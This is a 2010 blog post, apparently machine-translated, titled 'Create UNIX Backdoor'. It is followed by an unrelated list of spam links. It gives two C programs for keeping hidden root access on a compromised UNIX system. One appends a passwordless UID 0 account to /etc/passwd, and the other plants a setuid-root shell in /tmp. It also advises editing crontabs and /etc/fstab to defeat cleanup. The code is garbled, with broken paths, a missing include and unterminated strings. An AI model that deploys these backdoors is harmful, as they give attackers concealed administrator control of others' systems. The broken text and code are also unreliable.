Tuesday, October 5, 2010

Create UNIX Backdoor (primary chapter)

The easiest way is to add a password file passwd UID 0 accounts. But would rather not do, as long as the system administrator to check the password file will be "debacle" of. The following are in / etc / passwd password file, add a UID 0 account of the C program.

<+ +> Backdoor/backdoor1.c

# Include

main ()


FILE * fd;

fd = fopen ("/ etc / passwd", "a +");

fprintf (fd, "hax0r:: 0:0:: / root: / bin / sh



Than this method is a little bit hidden password file will be stored in an account no one is using UID to 0, and the second field (password field) is set to empty. (Note, if you are using a higher version of * nix, we might have to modify / etc / shadow file.)

In the / tmp directory to place suid shell. After running the program as long as you will easily be the root user privileges. This method is almost the most popular. However, many systems every few hours, or every time you start will clear the / tmp directory data, and some systems are simply not allowed to run the / tmp directory suid program. Of course, you can modify or remove these restrictions themselves (because you are the root user, have permission to edit / var / spool / cron / crontabs / root and / etc / fstab file). The following are in / tmp directory to place suid shell program C source code.

<+ +> Backdoor/backdoor2.c

# Include

main ()


system ("cp / bin / sh / tmp / fid");

system ("chown root.root / tmp / fid");

system ("chmod 4755 / tmp / fid");



Recommended links:

SPECIALIST Audio Rippers And Converters

Sina Focus M & A Suspected Insider Trading Fosun

MP4 to 3GP

online mobile store for used mobiles

Ten types of field bus architecture

On the OPERATION table

"Cockroaches Door", HP will lose?

New Web Development

3GPP Converter

Evaluate Audio Rippers And Converters

Fireworks of matting Kung Fu article

Capital Gray Screen Under The Waterfront

MP4 to Flash

MSN Also Has "never Gone" Fixed Base


No comments:

Post a Comment